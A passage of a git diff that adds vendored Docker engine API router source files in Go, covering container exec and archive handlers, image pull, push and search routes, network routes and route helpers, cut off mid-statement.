stat, err := s.backend.ContainerArchivePath(v.Name, v.Path) + if err != nil { + return err + } + defer tarArchive.Close() + + if err := setContainerPathStatHeader(stat, w.Header()); err != nil { + return err + } + + w.Header().Set("Content-Type", "application/x-tar") + _, err = io.Copy(w, tarArchive) + + return err +} + +func (s *containerRouter) putContainersArchive(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + v, err := httputils.ArchiveFormValues(r, vars) + if err != nil { + return err + } + + noOverwriteDirNonDir := httputils.BoolValue(r, "noOverwriteDirNonDir") + return s.backend.ContainerExtractToDir(v.Name, v.Path, noOverwriteDirNonDir, r.Body) +} diff --git a/vendor/github.com/docker/docker/api/server/router/container/exec.go b/vendor/github.com/docker/docker/api/server/router/container/exec.go new file mode 100644 index 0000000000..1134a0e797 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/container/exec.go @@ -0,0 +1,140 @@ +package container + +import ( + "encoding/json" + "fmt" + "io" + "net/http" + "strconv" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/server/httputils" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/pkg/stdcopy" + "golang.org/x/net/context" +) + +func (s *containerRouter) getExecByID(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + eConfig, err := s.backend.ContainerExecInspect(vars["id"]) + if err != nil { + return err + } + + return httputils.WriteJSON(w, http.StatusOK, eConfig) +} + +func (s *containerRouter) postContainerExecCreate(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + if err := httputils.CheckForJSON(r); err != nil { + return err + } + name := vars["name"] + + execConfig := &types.ExecConfig{} + if err := json.NewDecoder(r.Body).Decode(execConfig); err != nil { + return err + } + + if len(execConfig.Cmd) == 0 { + return fmt.Errorf("No exec command specified") + } + + // Register an instance of Exec in container. + id, err := s.backend.ContainerExecCreate(name, execConfig) + if err != nil { + logrus.Errorf("Error setting up exec command in container %s: %v", name, err) + return err + } + + return httputils.WriteJSON(w, http.StatusCreated, &types.IDResponse{ + ID: id, + }) +} + +// TODO(vishh): Refactor the code to avoid having to specify stream config as part of both create and start. +func (s *containerRouter) postContainerExecStart(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + version := httputils.VersionFromContext(ctx) + if versions.GreaterThan(version, "1.21") { + if err := httputils.CheckForJSON(r); err != nil { + return err + } + } + + var ( + execName = vars["name"] + stdin, inStream io.ReadCloser + stdout, stderr, outStream io.Writer + ) + + execStartCheck := &types.ExecStartCheck{} + if err := json.NewDecoder(r.Body).Decode(execStartCheck); err != nil { + return err + } + + if exists, err := s.backend.ExecExists(execName); !exists { + return err + } + + if !execStartCheck.Detach { + var err error + // Setting up the streaming http interface. + inStream, outStream, err = httputils.HijackConnection(w) + if err != nil { + return err + } + defer httputils.CloseStreams(inStream, outStream) + + if _, ok := r.Header["Upgrade"]; ok { + fmt.Fprint(outStream, "HTTP/1.1 101 UPGRADED\r\nContent-Type: application/vnd.docker.raw-stream\r\nConnection: Upgrade\r\nUpgrade: tcp\r\n") + } else { + fmt.Fprint(outStream, "HTTP/1.1 200 OK\r\nContent-Type: application/vnd.docker.raw-stream\r\n") + } + + // copy headers that were removed as part of hijack + if err := w.Header().WriteSubset(outStream, nil); err != nil { + return err + } + fmt.Fprint(outStream, "\r\n") + + stdin = inStream + stdout = outStream + if !execStartCheck.Tty { + stderr = stdcopy.NewStdWriter(outStream, stdcopy.Stderr) + stdout = stdcopy.NewStdWriter(outStream, stdcopy.Stdout) + } + } + + // Now run the user process in container. + // Maybe we should we pass ctx here if we're not detaching? + if err := s.backend.ContainerExecStart(context.Background(), execName, stdin, stdout, stderr); err != nil { + if execStartCheck.Detach { + return err + } + stdout.Write([]byte(err.Error() + "\r\n")) + logrus.Errorf("Error running exec in container: %v", err) + } + return nil +} + +func (s *containerRouter) postContainerExecResize(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + height, err := strconv.Atoi(r.Form.Get("h")) + if err != nil { + return err + } + width, err := strconv.Atoi(r.Form.Get("w")) + if err != nil { + return err + } + + return s.backend.ContainerExecResize(vars["name"], height, width) +} diff --git a/vendor/github.com/docker/docker/api/server/router/container/inspect.go b/vendor/github.com/docker/docker/api/server/router/container/inspect.go new file mode 100644 index 0000000000..dbbced7eee --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/container/inspect.go @@ -0,0 +1,21 @@ +package container + +import ( + "net/http" + + "github.com/docker/docker/api/server/httputils" + "golang.org/x/net/context" +) + +// getContainersByName inspects container's configuration and serializes it as json. +func (s *containerRouter) getContainersByName(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + displaySize := httputils.BoolValue(r, "size") + + version := httputils.VersionFromContext(ctx) + json, err := s.backend.ContainerInspect(vars["name"], displaySize, version) + if err != nil { + return err + } + + return httputils.WriteJSON(w, http.StatusOK, json) +} diff --git a/vendor/github.com/docker/docker/api/server/router/experimental.go b/vendor/github.com/docker/docker/api/server/router/experimental.go new file mode 100644 index 0000000000..51385c2552 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/experimental.go @@ -0,0 +1,67 @@ +package router + +import ( + "errors" + "net/http" + + "golang.org/x/net/context" + + apierrors "github.com/docker/docker/api/errors" + "github.com/docker/docker/api/server/httputils" +) + +var ( + errExperimentalFeature = errors.New("This experimental feature is disabled by default. Start the Docker daemon with --experimental in order to enable it.") +) + +// ExperimentalRoute defines an experimental API route that can be enabled or disabled. +type ExperimentalRoute interface { + Route + + Enable() + Disable() +} + +// experimentalRoute defines an experimental API route that can be enabled or disabled. +// It implements ExperimentalRoute +type experimentalRoute struct { + local Route + handler httputils.APIFunc +} + +// Enable enables this experimental route +func (r *experimentalRoute) Enable() { + r.handler = r.local.Handler() +} + +// Disable disables the experimental route +func (r *experimentalRoute) Disable() { + r.handler = experimentalHandler +} + +func experimentalHandler(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + return apierrors.NewErrorWithStatusCode(errExperimentalFeature, http.StatusNotImplemented) +} + +// Handler returns returns the APIFunc to let the server wrap it in middlewares. +func (r *experimentalRoute) Handler() httputils.APIFunc { + return r.handler +} + +// Method returns the http method that the route responds to. +func (r *experimentalRoute) Method() string { + return r.local.Method() +} + +// Path returns the subpath where the route responds to. +func (r *experimentalRoute) Path() string { + return r.local.Path() +} + +// Experimental will mark a route as experimental. +func Experimental(r Route) Route { + return &experimentalRoute{ + local: r, + handler: experimentalHandler, + } +} diff --git a/vendor/github.com/docker/docker/api/server/router/image/backend.go b/vendor/github.com/docker/docker/api/server/router/image/backend.go new file mode 100644 index 0000000000..19a67a5ed0 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/image/backend.go @@ -0,0 +1,45 @@ +package image + +import ( + "io" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/registry" + "golang.org/x/net/context" +) + +// Backend is all the methods that need to be implemented +// to provide image specific functionality. +type Backend interface { + containerBackend + imageBackend + importExportBackend + registryBackend +} + +type containerBackend interface { + Commit(name string, config *backend.ContainerCommitConfig) (imageID string, err error) +} + +type imageBackend interface { + ImageDelete(imageRef string, force, prune bool) ([]types.ImageDelete, error) + ImageHistory(imageName string) ([]*types.ImageHistory, error) + Images(imageFilters filters.Args, all bool, withExtraAttrs bool) ([]*types.ImageSummary, error) + LookupImage(name string) (*types.ImageInspect, error) + TagImage(imageName, repository, tag string) error + ImagesPrune(pruneFilters filters.Args) (*types.ImagesPruneReport, error) +} + +type importExportBackend interface { + LoadImage(inTar io.ReadCloser, outStream io.Writer, quiet bool) error + ImportImage(src string, repository, tag string, msg string, inConfig io.ReadCloser, outStream io.Writer, changes []string) error + ExportImage(names []string, outStream io.Writer) error +} + +type registryBackend interface { + PullImage(ctx context.Context, image, tag string, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error + PushImage(ctx context.Context, image, tag string, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error + SearchRegistryForImages(ctx context.Context, filtersArgs string, term string, limit int, authConfig *types.AuthConfig, metaHeaders map[string][]string) (*registry.SearchResults, error) +} diff --git a/vendor/github.com/docker/docker/api/server/router/image/image.go b/vendor/github.com/docker/docker/api/server/router/image/image.go new file mode 100644 index 0000000000..54a4d51482 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/image/image.go @@ -0,0 +1,50 @@ +package image + +import ( + "github.com/docker/docker/api/server/httputils" + "github.com/docker/docker/api/server/router" +) + +// imageRouter is a router to talk with the image controller +type imageRouter struct { + backend Backend + decoder httputils.ContainerDecoder + routes []router.Route +} + +// NewRouter initializes a new image router +func NewRouter(backend Backend, decoder httputils.ContainerDecoder) router.Router { + r := &imageRouter{ + backend: backend, + decoder: decoder, + } + r.initRoutes() + return r +} + +// Routes returns the available routes to the image controller +func (r *imageRouter) Routes() []router.Route { + return r.routes +} + +// initRoutes initializes the routes in the image router +func (r *imageRouter) initRoutes() { + r.routes = []router.Route{ + // GET + router.NewGetRoute("/images/json", r.getImagesJSON), + router.NewGetRoute("/images/search", r.getImagesSearch), + router.NewGetRoute("/images/get", r.getImagesGet), + router.NewGetRoute("/images/{name:.*}/get", r.getImagesGet), + router.NewGetRoute("/images/{name:.*}/history", r.getImagesHistory), + router.NewGetRoute("/images/{name:.*}/json", r.getImagesByName), + // POST + router.NewPostRoute("/commit", r.postCommit), + router.NewPostRoute("/images/load", r.postImagesLoad), + router.Cancellable(router.NewPostRoute("/images/create", r.postImagesCreate)), + router.Cancellable(router.NewPostRoute("/images/{name:.*}/push", r.postImagesPush)), + router.NewPostRoute("/images/{name:.*}/tag", r.postImagesTag), + router.NewPostRoute("/images/prune", r.postImagesPrune), + // DELETE + router.NewDeleteRoute("/images/{name:.*}", r.deleteImages), + } +} diff --git a/vendor/github.com/docker/docker/api/server/router/image/image_routes.go b/vendor/github.com/docker/docker/api/server/router/image/image_routes.go new file mode 100644 index 0000000000..69403652a0 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/image/image_routes.go @@ -0,0 +1,344 @@ +package image + +import ( + "encoding/base64" + "encoding/json" + "fmt" + "io" + "net/http" + "strconv" + "strings" + + "github.com/docker/docker/api/server/httputils" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/streamformatter" + "github.com/docker/docker/registry" + "golang.org/x/net/context" +) + +func (s *imageRouter) postCommit(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + if err := httputils.CheckForJSON(r); err != nil { + return err + } + + cname := r.Form.Get("container") + + pause := httputils.BoolValue(r, "pause") + version := httputils.VersionFromContext(ctx) + if r.FormValue("pause") == "" && versions.GreaterThanOrEqualTo(version, "1.13") { + pause = true + } + + c, _, _, err := s.decoder.DecodeConfig(r.Body) + if err != nil && err != io.EOF { //Do not fail if body is empty. + return err + } + if c == nil { + c = &container.Config{} + } + + commitCfg := &backend.ContainerCommitConfig{ + ContainerCommitConfig: types.ContainerCommitConfig{ + Pause: pause, + Repo: r.Form.Get("repo"), + Tag: r.Form.Get("tag"), + Author: r.Form.Get("author"), + Comment: r.Form.Get("comment"), + Config: c, + MergeConfigs: true, + }, + Changes: r.Form["changes"], + } + + imgID, err := s.backend.Commit(cname, commitCfg) + if err != nil { + return err + } + + return httputils.WriteJSON(w, http.StatusCreated, &types.IDResponse{ + ID: string(imgID), + }) +} + +// Creates an image from Pull or from Import +func (s *imageRouter) postImagesCreate(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + var ( + image = r.Form.Get("fromImage") + repo = r.Form.Get("repo") + tag = r.Form.Get("tag") + message = r.Form.Get("message") + err error + output = ioutils.NewWriteFlusher(w) + ) + defer output.Close() + + w.Header().Set("Content-Type", "application/json") + + if image != "" { //pull + metaHeaders := map[string][]string{} + for k, v := range r.Header { + if strings.HasPrefix(k, "X-Meta-") { + metaHeaders[k] = v + } + } + + authEncoded := r.Header.Get("X-Registry-Auth") + authConfig := &types.AuthConfig{} + if authEncoded != "" { + authJSON := base64.NewDecoder(base64.URLEncoding, strings.NewReader(authEncoded)) + if err := json.NewDecoder(authJSON).Decode(authConfig); err != nil { + // for a pull it is not an error if no auth was given + // to increase compatibility with the existing api it is defaulting to be empty + authConfig = &types.AuthConfig{} + } + } + + err = s.backend.PullImage(ctx, image, tag, metaHeaders, authConfig, output) + } else { //import + src := r.Form.Get("fromSrc") + // 'err' MUST NOT be defined within this block, we need any error + // generated from the download to be available to the output + // stream processing below + err = s.backend.ImportImage(src, repo, tag, message, r.Body, output, r.Form["changes"]) + } + if err != nil { + if !output.Flushed() { + return err + } + sf := streamformatter.NewJSONStreamFormatter() + output.Write(sf.FormatError(err)) + } + + return nil +} + +func (s *imageRouter) postImagesPush(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + metaHeaders := map[string][]string{} + for k, v := range r.Header { + if strings.HasPrefix(k, "X-Meta-") { + metaHeaders[k] = v + } + } + if err := httputils.ParseForm(r); err != nil { + return err + } + authConfig := &types.AuthConfig{} + + authEncoded := r.Header.Get("X-Registry-Auth") + if authEncoded != "" { + // the new format is to handle the authConfig as a header + authJSON := base64.NewDecoder(base64.URLEncoding, strings.NewReader(authEncoded)) + if err := json.NewDecoder(authJSON).Decode(authConfig); err != nil { + // to increase compatibility to existing api it is defaulting to be empty + authConfig = &types.AuthConfig{} + } + } else { + // the old format is supported for compatibility if there was no authConfig header + if err := json.NewDecoder(r.Body).Decode(authConfig); err != nil { + return fmt.Errorf("Bad parameters and missing X-Registry-Auth: %v", err) + } + } + + image := vars["name"] + tag := r.Form.Get("tag") + + output := ioutils.NewWriteFlusher(w) + defer output.Close() + + w.Header().Set("Content-Type", "application/json") + + if err := s.backend.PushImage(ctx, image, tag, metaHeaders, authConfig, output); err != nil { + if !output.Flushed() { + return err + } + sf := streamformatter.NewJSONStreamFormatter() + output.Write(sf.FormatError(err)) + } + return nil +} + +func (s *imageRouter) getImagesGet(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + w.Header().Set("Content-Type", "application/x-tar") + + output := ioutils.NewWriteFlusher(w) + defer output.Close() + var names []string + if name, ok := vars["name"]; ok { + names = []string{name} + } else { + names = r.Form["names"] + } + + if err := s.backend.ExportImage(names, output); err != nil { + if !output.Flushed() { + return err + } + sf := streamformatter.NewJSONStreamFormatter() + output.Write(sf.FormatError(err)) + } + return nil +} + +func (s *imageRouter) postImagesLoad(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + quiet := httputils.BoolValueOrDefault(r, "quiet", true) + + w.Header().Set("Content-Type", "application/json") + + output := ioutils.NewWriteFlusher(w) + defer output.Close() + if err := s.backend.LoadImage(r.Body, output, quiet); err != nil { + output.Write(streamformatter.NewJSONStreamFormatter().FormatError(err)) + } + return nil +} + +func (s *imageRouter) deleteImages(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + name := vars["name"] + + if strings.TrimSpace(name) == "" { + return fmt.Errorf("image name cannot be blank") + } + + force := httputils.BoolValue(r, "force") + prune := !httputils.BoolValue(r, "noprune") + + list, err := s.backend.ImageDelete(name, force, prune) + if err != nil { + return err + } + + return httputils.WriteJSON(w, http.StatusOK, list) +} + +func (s *imageRouter) getImagesByName(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + imageInspect, err := s.backend.LookupImage(vars["name"]) + if err != nil { + return err + } + + return httputils.WriteJSON(w, http.StatusOK, imageInspect) +} + +func (s *imageRouter) getImagesJSON(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + imageFilters, err := filters.FromParam(r.Form.Get("filters")) + if err != nil { + return err + } + + version := httputils.VersionFromContext(ctx) + filterParam := r.Form.Get("filter") + if versions.LessThan(version, "1.28") && filterParam != "" { + imageFilters.Add("reference", filterParam) + } + + images, err := s.backend.Images(imageFilters, httputils.BoolValue(r, "all"), false) + if err != nil { + return err + } + + return httputils.WriteJSON(w, http.StatusOK, images) +} + +func (s *imageRouter) getImagesHistory(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + name := vars["name"] + history, err := s.backend.ImageHistory(name) + if err != nil { + return err + } + + return httputils.WriteJSON(w, http.StatusOK, history) +} + +func (s *imageRouter) postImagesTag(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + if err := s.backend.TagImage(vars["name"], r.Form.Get("repo"), r.Form.Get("tag")); err != nil { + return err + } + w.WriteHeader(http.StatusCreated) + return nil +} + +func (s *imageRouter) getImagesSearch(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + var ( + config *types.AuthConfig + authEncoded = r.Header.Get("X-Registry-Auth") + headers = map[string][]string{} + ) + + if authEncoded != "" { + authJSON := base64.NewDecoder(base64.URLEncoding, strings.NewReader(authEncoded)) + if err := json.NewDecoder(authJSON).Decode(&config); err != nil { + // for a search it is not an error if no auth was given + // to increase compatibility with the existing api it is defaulting to be empty + config = &types.AuthConfig{} + } + } + for k, v := range r.Header { + if strings.HasPrefix(k, "X-Meta-") { + headers[k] = v + } + } + limit := registry.DefaultSearchLimit + if r.Form.Get("limit") != "" { + limitValue, err := strconv.Atoi(r.Form.Get("limit")) + if err != nil { + return err + } + limit = limitValue + } + query, err := s.backend.SearchRegistryForImages(ctx, r.Form.Get("filters"), r.Form.Get("term"), limit, config, headers) + if err != nil { + return err + } + return httputils.WriteJSON(w, http.StatusOK, query.Results) +} + +func (s *imageRouter) postImagesPrune(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + pruneFilters, err := filters.FromParam(r.Form.Get("filters")) + if err != nil { + return err + } + + pruneReport, err := s.backend.ImagesPrune(pruneFilters) + if err != nil { + return err + } + return httputils.WriteJSON(w, http.StatusOK, pruneReport) +} diff --git a/vendor/github.com/docker/docker/api/server/router/local.go b/vendor/github.com/docker/docker/api/server/router/local.go new file mode 100644 index 0000000000..7cb2a5a2f3 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/local.go @@ -0,0 +1,96 @@ +package router + +import ( + "net/http" + + "github.com/docker/docker/api/server/httputils" + "golang.org/x/net/context" +) + +// localRoute defines an individual API route to connect +// with the docker daemon. It implements Route. +type localRoute struct { + method string + path string + handler httputils.APIFunc +} + +// Handler returns the APIFunc to let the server wrap it in middlewares. +func (l localRoute) Handler() httputils.APIFunc { + return l.handler +} + +// Method returns the http method that the route responds to. +func (l localRoute) Method() string { + return l.method +} + +// Path returns the subpath where the route responds to. +func (l localRoute) Path() string { + return l.path +} + +// NewRoute initializes a new local route for the router. +func NewRoute(method, path string, handler httputils.APIFunc) Route { + return localRoute{method, path, handler} +} + +// NewGetRoute initializes a new route with the http method GET. +func NewGetRoute(path string, handler httputils.APIFunc) Route { + return NewRoute("GET", path, handler) +} + +// NewPostRoute initializes a new route with the http method POST. +func NewPostRoute(path string, handler httputils.APIFunc) Route { + return NewRoute("POST", path, handler) +} + +// NewPutRoute initializes a new route with the http method PUT. +func NewPutRoute(path string, handler httputils.APIFunc) Route { + return NewRoute("PUT", path, handler) +} + +// NewDeleteRoute initializes a new route with the http method DELETE. +func NewDeleteRoute(path string, handler httputils.APIFunc) Route { + return NewRoute("DELETE", path, handler) +} + +// NewOptionsRoute initializes a new route with the http method OPTIONS. +func NewOptionsRoute(path string, handler httputils.APIFunc) Route { + return NewRoute("OPTIONS", path, handler) +} + +// NewHeadRoute initializes a new route with the http method HEAD. +func NewHeadRoute(path string, handler httputils.APIFunc) Route { + return NewRoute("HEAD", path, handler) +} + +func cancellableHandler(h httputils.APIFunc) httputils.APIFunc { + return func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if notifier, ok := w.(http.CloseNotifier); ok { + notify := notifier.CloseNotify() + notifyCtx, cancel := context.WithCancel(ctx) + finished := make(chan struct{}) + defer close(finished) + ctx = notifyCtx + go func() { + select { + case <-notify: + cancel() + case <-finished: + } + }() + } + return h(ctx, w, r, vars) + } +} + +// Cancellable makes new route which embeds http.CloseNotifier feature to +// context.Context of handler. +func Cancellable(r Route) Route { + return localRoute{ + method: r.Method(), + path: r.Path(), + handler: cancellableHandler(r.Handler()), + } +} diff --git a/vendor/github.com/docker/docker/api/server/router/network/backend.go b/vendor/github.com/docker/docker/api/server/router/network/backend.go new file mode 100644 index 0000000000..0d1dfb0123 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/network/backend.go @@ -0,0 +1,22 @@ +package network + +import ( + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/network" + "github.com/docker/libnetwork" +) + +// Backend is all the methods that need to be implemented +// to provide network specific functionality. +type Backend interface { + FindNetwork(idName string) (libnetwork.Network, error) + GetNetworkByName(idName string) (libnetwork.Network, error) + GetNetworksByID(partialID string) []libnetwork.Network + GetNetworks() []libnetwork.Network + CreateNetwork(nc types.NetworkCreateRequest) (*types.NetworkCreateResponse, error) + ConnectContainerToNetwork(containerName, networkName string, endpointConfig *network.EndpointSettings) error + DisconnectContainerFromNetwork(containerName string, networkName string, force bool) error + DeleteNetwork(name string) error + NetworksPrune(pruneFilters filters.Args) (*types.NetworksPruneReport, error) +} diff --git a/vendor/github.com/docker/docker/api/server/router/network/filter.go b/vendor/github.com/docker/docker/api/server/router/network/filter.go new file mode 100644 index 0000000000..94affb83cd --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/network/filter.go @@ -0,0 +1,96 @@ +package network + +import ( + "fmt" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/runconfig" +) + +var ( + // AcceptedFilters is an acceptable filters for validation + AcceptedFilters = map[string]bool{ + "driver": true, + "type": true, + "name": true, + "id": true, + "label": true, + } +) + +func filterNetworkByType(nws []types.NetworkResource, netType string) (retNws []types.NetworkResource, err error) { + switch netType { + case "builtin": + for _, nw := range nws { + if runconfig.IsPreDefinedNetwork(nw.Name) { + retNws = append(retNws, nw) + } + } + case "custom": + for _, nw := range nws { + if !runconfig.IsPreDefinedNetwork(nw.Name) { + retNws = append(retNws, nw) + } + } + default: + return nil, fmt.Errorf("Invalid filter: 'type'='%s'", netType) + } + return retNws, nil +} + +// filterNetworks filters network list according to user specified filter +// and returns user chosen networks +func filterNetworks(nws []types.NetworkResource, filter filters.Args) ([]types.NetworkResource, error) { + // if filter is empty, return original network list + if filter.Len() == 0 { + return nws, nil + } + + if err := filter.Validate(AcceptedFilters); err != nil { + return nil, err + } + + displayNet := []types.NetworkResource{} + for _, nw := range nws { + if filter.Include("driver") { + if !filter.ExactMatch("driver", nw.Driver) { + continue + } + } + if filter.Include("name") { + if !filter.Match("name", nw.Name) { + continue + } + } + if filter.Include("id") { + if !filter.Match("id", nw.ID) { + continue + } + } + if filter.Include("label") { + if !filter.MatchKVList("label", nw.Labels) { + continue + } + } + displayNet = append(displayNet, nw) + } + + if filter.Include("type") { + var typeNet []types.NetworkResource + errFilter := filter.WalkValues("type", func(fval string) error { + passList, err := filterNetworkByType(displayNet, fval) + if err != nil { + return err + } + typeNet = append(typeNet, passList...) + return nil + }) + if errFilter != nil { + return nil, errFilter + } + displayNet = typeNet + } + + return displayNet, nil +} diff --git a/vendor/github.com/docker/docker/api/server/router/network/network.go b/vendor/github.com/docker/docker/api/server/router/network/network.go new file mode 100644 index 0000000000..08a5c8c6a6 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/network/network.go @@ -0,0 +1,44 @@ +package network + +import ( + "github.com/docker/docker/api/server/router" + "github.com/docker/docker/daemon/cluster" +) + +// networkRouter is a router to talk with the network controller +type networkRouter struct { + backend Backend + clusterProvider *cluster.Cluster + routes []router.Route +} + +// NewRouter initializes a new network router +func NewRouter(b Backend, c *cluster.Cluster) router.Router { + r := &networkRouter{ + backend: b, + clusterProvider: c, + } + r.initRoutes() + return r +} + +// Routes returns the available routes to the network controller +func (r *networkRouter) Routes() []router.Route { + return r.routes +} + +func (r *networkRouter) initRoutes() { + r.routes = []router.Route{ + // GET + router.NewGetRoute("/networks", r.getNetworksList), + router.NewGetRoute("/networks/", r.getNetworksList), + router.NewGetRoute("/networks/{id:.+}", r.getNetwork), + // POST + router.NewPostRoute("/networks/create", r.postNetworkCreate), + router.NewPostRoute("/networks/{id:.*}/connect", r.postNetworkConnect), + router.NewPostRoute("/networks/{id:.*}/disconnect", r.postNetworkDisconnect), + router.NewPostRoute("/networks/prune", r.postNetworksPrune), + // DELETE + router.NewDeleteRoute("/networks/{id:.*}", r.deleteNetwork), + } +} diff --git a/vendor/github.com/docker/docker/api/server/router/network/network_routes.go b/vendor/github.com/docker/docker/api/server/router/network/network_routes.go new file mode 100644 index 0000000000..7bfc499552 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/network/network_routes.go @@ -0,0 +1,308 @@ +package network + +import ( + "encoding/json" + "net/http" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/server/httputils" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/network" + "github.com/docker/libnetwork" + "github.com/docker/libnetwork/networkdb" +) + +func (n *networkRouter) getNetworksList(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + filter := r.Form.Get("filters") + netFilters, err := filters.FromParam(filter) + if err != nil { + return err + } + + list := []types.NetworkResource{} + + if nr, err := n.clusterProvider.GetNetworks(); err == nil { + list = append(list, nr...) + } + + // Combine the network list returned by Docker daemon if it is not already + // returned by the cluster manager +SKIP: + for _, nw := range n.backend.GetNetworks() { + for _, nl := range list { + if nl.ID == nw.ID() { + continue SKIP + } + } + list = append(list, *n.buildNetworkResource(nw)) + } + + list, err = filterNetworks(list, netFilters) + if err != nil { + return err + } + return httputils.WriteJSON(w, http.StatusOK, list) +} + +func (n *networkRouter) getNetwork(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + nw, err := n.backend.FindNetwork(vars["id"]) + if err != nil { + if nr, err := n.clusterProvider.GetNetwork(vars["id"]); err == nil { + return httputils.WriteJSON(w, http.StatusOK, nr) + } + return err + } + return httputils.WriteJSON(w, http.StatusOK, n.buildNetworkResource(nw)) +} + +func (n *networkRouter) postNetworkCreate(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + var create types.NetworkCreateRequest + + if err := httputils.ParseForm(r); err != nil { + return err + } + + if err := httputils.CheckForJSON(r); err != nil { + return err + } + + if err := json.NewDecoder(r.Body).Decode(&create); err != nil { + return err + } + + if nws, err := n.clusterProvider.GetNetworksByName(create.Name); err == nil && len(nws) > 0 { + return libnetwork.NetworkNameError(create.Name) + } + + nw, err := n.backend.CreateNetwork(create) + if err != nil { + if _, ok := err.(libnetwork.ManagerRedirectError); !ok { + return err + } + id, err := n.clusterProvider.CreateNetwork(create) + if err != nil { + return err + } + nw = &types.NetworkCreateResponse{ID: id} + } + + return httputils.WriteJSON(w, http.StatusCreated, nw) +} + +func (n *networkRouter) postNetworkConnect(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + var connect types.NetworkConnect + if err := httputils.ParseForm(r); err != nil { + return err + } + + if err := httputils.CheckForJSON(r); err != nil { + return err + } + + if err := json.NewDecoder(r.Body).Decode(&connect); err != nil { + return err + } + + return n.backend.ConnectContainerToNetwork(connect.Container, vars["id"], connect.EndpointConfig) +} + +func (n *networkRouter) postNetworkDisconnect(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + var disconnect types.NetworkDisconnect + if err := httputils.ParseForm(r); err != nil { + return err + } + + if err := httputils.CheckForJSON(r); err != nil { + return err + } + + if err := json.NewDecoder(r.Body).Decode(&disconnect); err != nil { + return err + } + + return n.backend.DisconnectContainerFromNetwork(disconnect.Container, vars["id"], disconnect.Force) +} + +func (n *networkRouter) deleteNetwork(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + if _, err := n.clusterProvider.GetNetwork(vars["id"]); err == nil { + if err = n.clusterProvider.RemoveNetwork(vars["id"]); err != nil { + return err + } + w.WriteHeader(http.StatusNoContent) + return nil + } + if err := n.backend.DeleteNetwork(vars["id"]); err != nil { + return err + } + w.WriteHeader(http.StatusNoContent) + return nil +} + +func (n *networkRouter) buildNetworkResource(nw libnetwork.Network) *types.NetworkResource { + r := &types.NetworkResource{} + if nw == nil { + return r + } + + info := nw.Info() + r.Name = nw.Name() + r.ID = nw.ID() + r.Created = info.Created() + r.Scope = info.Scope() + if n.clusterProvider.IsManager() { + if _, err := n.clusterProvider.GetNetwork(nw.ID()); err == nil { + r.Scope = "swarm" + } + } else if info.Dynamic() { + r.Scope = 